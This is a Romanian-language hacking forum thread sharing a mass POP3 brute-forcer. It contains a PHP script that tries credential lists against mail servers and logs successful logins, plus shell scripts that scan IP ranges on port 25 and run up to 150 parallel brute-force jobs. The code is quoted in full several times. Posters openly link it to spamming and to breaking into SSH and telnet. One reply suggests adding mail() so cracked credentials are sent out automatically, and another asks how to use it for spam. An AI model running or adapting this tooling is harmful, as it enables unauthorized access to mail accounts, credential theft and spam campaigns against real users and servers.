Jump to content
UstupidMF

mass bruteforcer ...

By UstupidMF, in Exploituri

Recommended Posts

UstupidMF Newbie

UstupidMF

Posted
Posted

L-am gasit pe un server si face treaba,scanatzi port 25 ... punetzi la bruteforce si dupa ce va plictisiti si va apucatzi sa le luatzi la puricat,incercatzi port,23,22,1080,21 ssh si telnet,merg majoritatea pt ssh login

Care se ocupa cu spam ... poate trimite mailuri de pe usere la udrea.ro

cat sesion.php

<?php

error_reporting(0);

function POPa($username, $password, $server) {

$socket = fsockopen($server, 110); // POP3 port

if (!$socket) {

return "cracked";

}

$res = fgets($socket, 512); // read +OK

if (substr(trim($res), 0, 3) != "+OK") {

return "cracked"; // return the error

}

fputs($socket, "USER $username\r\n"); // send user

$res = fgets($socket, 512); // read +OK

if (substr(trim($res), 0, 3) != "+OK") {

return "cracked";

}

fputs($socket, "PASS $password\r\n"); // send pass

$res = fgets($socket, 512); // read +OK

if (substr(trim($res), 0, 3) != "+OK") {

return $res;

}

fputs($socket, "QUIT\r\n"); // quit

fclose($socket);

$fp = fopen("vuln.txt", "a+");

fwrite($fp, "$server $username $password\n");

fclose($fp);

return "cracked";

}

//SET INITIAL LOAD

$ip = $argv[1];

//READ USER/PASS FILE

$fp = fopen("pass_file", "r");

$i = 1;

$c2= 1;

while (!feof($fp)) {

$propozitie = fgets($fp, 4096);

$propozitie = explode(" ", $propozitie);

$user[$i] = $propozitie[0];

@$pass[$i] = $propozitie[1];

$i = $i + 1;

$c2 = $c2 + 1;

}

fclose($fp);

//Do BRUTE-FORCE ATACK

$x = 1;

$chestie = "not";

while (( $x < $c2 ) and ( $chestie != "cracked" )) {

$chestie = POPa($user[$x], $pass[$x], $ip);

if ( $chestie == "cracked" ) {

$quit = 1;

}

$x = $x + 1;

}

//SET END LOAD

?>

cat mass

./ss 25 -b $1.0 -i eth0 -s 10

./ss 25 -b $1.1 -i eth0 -s 10

./ss 25 -b $1.2 -i eth0 -s 10

./ss 25 -b $1.3 -i eth0 -s 10

./ss 25 -b $1.4 -i eth0 -s 10

./ss 25 -b $1.5 -i eth0 -s 10

./ss 25 -b $1.6 -i eth0 -s 10

./ss 25 -b $1.7 -i eth0 -s 10

./ss 25 -b $1.8 -i eth0 -s 10

./ss 25 -b $1.9 -i eth0 -s 10

./ss 25 -b $1.10 -i eth0 -s 10

cat bios.txt | sort | uniq > mfu.txt

CONTOR=0

for i in `cat mfu.txt`

do

CONTOR=`ps aux | grep -c php`

while [ $CONTOR -ge 150 ];do

CONTOR=`ps aux | grep -c php`

echo "Sleeping"

sleep 5

done

if [ $CONTOR -le 150 ]; then

php sesion.php $i > /dev/null &

fi

done

sleep 10

rm -rf bios.txt mfu.txt

./ss 25 -b $1.11 -i eth0 -s 10

./ss 25 -b $1.12 -i eth0 -s 10

./ss 25 -b $1.13 -i eth0 -s 10

./ss 25 -b $1.14 -i eth0 -s 10

./ss 25 -b $1.15 -i eth0 -s 10

./ss 25 -b $1.16 -i eth0 -s 10

./ss 25 -b $1.17 -i eth0 -s 10

./ss 25 -b $1.18 -i eth0 -s 10

./ss 25 -b $1.19 -i eth0 -s 10

./ss 25 -b $1.20 -i eth0 -s 10

cat bios.txt | sort | uniq > mfu.txt

CONTOR=0

for i in `cat mfu.txt`

do

CONTOR=`ps aux | grep -c php`

while [ $CONTOR -ge 150 ];do

CONTOR=`ps aux | grep -c php`

echo "Sleeping"

sleep 5

done

if [ $CONTOR -le 150 ]; then

php sesion.php $i > /dev/null &

fi

done

sleep 10

rm -rf bios.txt mfu.txt

cat start

echo "POP3 BruteForce"

echo "By(val) Rsx200"

./ps $1 25

sleep 5

echo "Doing BruteForce..."

cat $1.pscan.25 | sort | uniq > mfu.txt

CONTOR=0

for i in `cat mfu.txt`

do

CONTOR=`ps aux | grep -c php`

while [ $CONTOR -ge 150 ];do

CONTOR=`ps aux | grep -c php`

echo "Sleeping"

sleep 5

done

if [ $CONTOR -le 150 ]; then

php sesion.php $i > /dev/null &

fi

done

johnyinc Newbie

johnyinc

Posted
Posted

fisierul "Ss" ( synscan ) il poti lua de pe google, ultima versiune si ti-o compilezi

in legatura cu scriptul, ce pot sa zic este ca il folosesc de aprox 2 ani

face brute force pt Pop3, din 3000 aproximativ, cam 200 sunt si smtp-uri, deci mare treaba cu el nu e

cum a zis OP, nu e asa usor incat sa schimbi portul si face brute pt ssh, ftp sau altele, e doar pt Pop3

ar fi frumos daca cineva s-ar ocupa sa ii schimbe socket-urile pt comenzile care se dau prin smtp, in base64

le am eu, doar ca nu ma pricep sa fac asta

un sfat pentru cei care il folosesc : bagati-va si functia mail() in script, sa numai stai toata ziua sa verificati loguri prin rooturi sau shelluri

sectorzueira Newbie

sectorzueira

Posted
Posted

Can you give it to UBUNTU 11.04 ? Thanks, in ubuntu no save ip's on txt...sorry to myd bad english. cat vuln.txt = 0 ip's ;/ in centos = 100% in ubuntu =0% help me please :))

L-am gasit pe un server si face treaba,scanatzi port 25 ... punetzi la bruteforce si dupa ce va plictisiti si va apucatzi sa le luatzi la puricat,incercatzi port,23,22,1080,21 ssh si telnet,merg majoritatea pt ssh login

Care se ocupa cu spam ... poate trimite mailuri de pe usere la udrea.ro

cat sesion.php

<?php

error_reporting(0);

function POPa($username, $password, $server) {

$socket = fsockopen($server, 110); // POP3 port

if (!$socket) {

return "cracked";

}

$res = fgets($socket, 512); // read +OK

if (substr(trim($res), 0, 3) != "+OK") {

return "cracked"; // return the error

}

fputs($socket, "USER $username\r\n"); // send user

$res = fgets($socket, 512); // read +OK

if (substr(trim($res), 0, 3) != "+OK") {

return "cracked";

}

fputs($socket, "PASS $password\r\n"); // send pass

$res = fgets($socket, 512); // read +OK

if (substr(trim($res), 0, 3) != "+OK") {

return $res;

}

fputs($socket, "QUIT\r\n"); // quit

fclose($socket);

$fp = fopen("vuln.txt", "a+");

fwrite($fp, "$server $username $password\n");

fclose($fp);

return "cracked";

}

//SET INITIAL LOAD

$ip = $argv[1];

//READ USER/PASS FILE

$fp = fopen("pass_file", "r");

$i = 1;

$c2= 1;

while (!feof($fp)) {

$propozitie = fgets($fp, 4096);

$propozitie = explode(" ", $propozitie);

$user[$i] = $propozitie[0];

@$pass[$i] = $propozitie[1];

$i = $i + 1;

$c2 = $c2 + 1;

}

fclose($fp);

//Do BRUTE-FORCE ATACK

$x = 1;

$chestie = "not";

while (( $x < $c2 ) and ( $chestie != "cracked" )) {

$chestie = POPa($user[$x], $pass[$x], $ip);

if ( $chestie == "cracked" ) {

$quit = 1;

}

$x = $x + 1;

}

//SET END LOAD

?>

cat mass

./ss 25 -b $1.0 -i eth0 -s 10

./ss 25 -b $1.1 -i eth0 -s 10

./ss 25 -b $1.2 -i eth0 -s 10

./ss 25 -b $1.3 -i eth0 -s 10

./ss 25 -b $1.4 -i eth0 -s 10

./ss 25 -b $1.5 -i eth0 -s 10

./ss 25 -b $1.6 -i eth0 -s 10

./ss 25 -b $1.7 -i eth0 -s 10

./ss 25 -b $1.8 -i eth0 -s 10

./ss 25 -b $1.9 -i eth0 -s 10

./ss 25 -b $1.10 -i eth0 -s 10

cat bios.txt | sort | uniq > mfu.txt

CONTOR=0

for i in `cat mfu.txt`

do

CONTOR=`ps aux | grep -c php`

while [ $CONTOR -ge 150 ];do

CONTOR=`ps aux | grep -c php`

echo "Sleeping"

sleep 5

done

if [ $CONTOR -le 150 ]; then

php sesion.php $i > /dev/null &

fi

done

sleep 10

rm -rf bios.txt mfu.txt

./ss 25 -b $1.11 -i eth0 -s 10

./ss 25 -b $1.12 -i eth0 -s 10

./ss 25 -b $1.13 -i eth0 -s 10

./ss 25 -b $1.14 -i eth0 -s 10

./ss 25 -b $1.15 -i eth0 -s 10

./ss 25 -b $1.16 -i eth0 -s 10

./ss 25 -b $1.17 -i eth0 -s 10

./ss 25 -b $1.18 -i eth0 -s 10

./ss 25 -b $1.19 -i eth0 -s 10

./ss 25 -b $1.20 -i eth0 -s 10

cat bios.txt | sort | uniq > mfu.txt

CONTOR=0

for i in `cat mfu.txt`

do

CONTOR=`ps aux | grep -c php`

while [ $CONTOR -ge 150 ];do

CONTOR=`ps aux | grep -c php`

echo "Sleeping"

sleep 5

done

if [ $CONTOR -le 150 ]; then

php sesion.php $i > /dev/null &

fi

done

sleep 10

rm -rf bios.txt mfu.txt

cat start

echo "POP3 BruteForce"

echo "By(val) Rsx200"

./ps $1 25

sleep 5

echo "Doing BruteForce..."

cat $1.pscan.25 | sort | uniq > mfu.txt

CONTOR=0

for i in `cat mfu.txt`

do

CONTOR=`ps aux | grep -c php`

while [ $CONTOR -ge 150 ];do

CONTOR=`ps aux | grep -c php`

echo "Sleeping"

sleep 5

done

if [ $CONTOR -le 150 ]; then

php sesion.php $i > /dev/null &

fi

done

valdez2020 Newbie

valdez2020

Posted
Posted
L-am gasit pe un server si face treaba,scanatzi port 25 ... punetzi la bruteforce si dupa ce va plictisiti si va apucatzi sa le luatzi la puricat,incercatzi port,23,22,1080,21 ssh si telnet,merg majoritatea pt ssh login

Care se ocupa cu spam ... poate trimite mailuri de pe usere la udrea.ro

cat sesion.php

<?php

error_reporting(0);

function POPa($username, $password, $server) {

$socket = fsockopen($server, 110); // POP3 port

if (!$socket) {

return "cracked";

}

$res = fgets($socket, 512); // read +OK

if (substr(trim($res), 0, 3) != "+OK") {

return "cracked"; // return the error

}

fputs($socket, "USER $username\r\n"); // send user

$res = fgets($socket, 512); // read +OK

if (substr(trim($res), 0, 3) != "+OK") {

return "cracked";

}

fputs($socket, "PASS $password\r\n"); // send pass

$res = fgets($socket, 512); // read +OK

if (substr(trim($res), 0, 3) != "+OK") {

return $res;

}

fputs($socket, "QUIT\r\n"); // quit

fclose($socket);

$fp = fopen("vuln.txt", "a+");

fwrite($fp, "$server $username $password\n");

fclose($fp);

return "cracked";

}

//SET INITIAL LOAD

$ip = $argv[1];

//READ USER/PASS FILE

$fp = fopen("pass_file", "r");

$i = 1;

$c2= 1;

while (!feof($fp)) {

$propozitie = fgets($fp, 4096);

$propozitie = explode(" ", $propozitie);

$user[$i] = $propozitie[0];

@$pass[$i] = $propozitie[1];

$i = $i + 1;

$c2 = $c2 + 1;

}

fclose($fp);

//Do BRUTE-FORCE ATACK

$x = 1;

$chestie = "not";

while (( $x < $c2 ) and ( $chestie != "cracked" )) {

$chestie = POPa($user[$x], $pass[$x], $ip);

if ( $chestie == "cracked" ) {

$quit = 1;

}

$x = $x + 1;

}

//SET END LOAD

?>

cat mass

./ss 25 -b $1.0 -i eth0 -s 10

./ss 25 -b $1.1 -i eth0 -s 10

./ss 25 -b $1.2 -i eth0 -s 10

./ss 25 -b $1.3 -i eth0 -s 10

./ss 25 -b $1.4 -i eth0 -s 10

./ss 25 -b $1.5 -i eth0 -s 10

./ss 25 -b $1.6 -i eth0 -s 10

./ss 25 -b $1.7 -i eth0 -s 10

./ss 25 -b $1.8 -i eth0 -s 10

./ss 25 -b $1.9 -i eth0 -s 10

./ss 25 -b $1.10 -i eth0 -s 10

cat bios.txt | sort | uniq > mfu.txt

CONTOR=0

for i in `cat mfu.txt`

do

CONTOR=`ps aux | grep -c php`

while [ $CONTOR -ge 150 ];do

CONTOR=`ps aux | grep -c php`

echo "Sleeping"

sleep 5

done

if [ $CONTOR -le 150 ]; then

php sesion.php $i > /dev/null &

fi

done

sleep 10

rm -rf bios.txt mfu.txt

./ss 25 -b $1.11 -i eth0 -s 10

./ss 25 -b $1.12 -i eth0 -s 10

./ss 25 -b $1.13 -i eth0 -s 10

./ss 25 -b $1.14 -i eth0 -s 10

./ss 25 -b $1.15 -i eth0 -s 10

./ss 25 -b $1.16 -i eth0 -s 10

./ss 25 -b $1.17 -i eth0 -s 10

./ss 25 -b $1.18 -i eth0 -s 10

./ss 25 -b $1.19 -i eth0 -s 10

./ss 25 -b $1.20 -i eth0 -s 10

cat bios.txt | sort | uniq > mfu.txt

CONTOR=0

for i in `cat mfu.txt`

do

CONTOR=`ps aux | grep -c php`

while [ $CONTOR -ge 150 ];do

CONTOR=`ps aux | grep -c php`

echo "Sleeping"

sleep 5

done

if [ $CONTOR -le 150 ]; then

php sesion.php $i > /dev/null &

fi

done

sleep 10

rm -rf bios.txt mfu.txt

cat start

echo "POP3 BruteForce"

echo "By(val) Rsx200"

./ps $1 25

sleep 5

echo "Doing BruteForce..."

cat $1.pscan.25 | sort | uniq > mfu.txt

CONTOR=0

for i in `cat mfu.txt`

do

CONTOR=`ps aux | grep -c php`

while [ $CONTOR -ge 150 ];do

CONTOR=`ps aux | grep -c php`

echo "Sleeping"

sleep 5

done

if [ $CONTOR -le 150 ]; then

php sesion.php $i > /dev/null &

fi

done

Salut , cum pot sa fac spam cu mass bruteforcer, ma puteti ajuta si pe mine ?

Rumy Newbie

Rumy

Posted
Posted

Pe 23 scaneaza telnet sau ssh ? Din cate stiu nu exista sursa pt scanner pt telnet 23 si asta cred ca prinde smtp ftp ssh22 https,etc.. adik iti probeaza pe toate? Am un scanner la fel si deaia zic ca e cam la fel. Stie cineva daca exista vreun scanner sau ceva de genu pt telnet 23 sau sa ii poti schimba tu portu pe care vrei sa scanezi ?

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...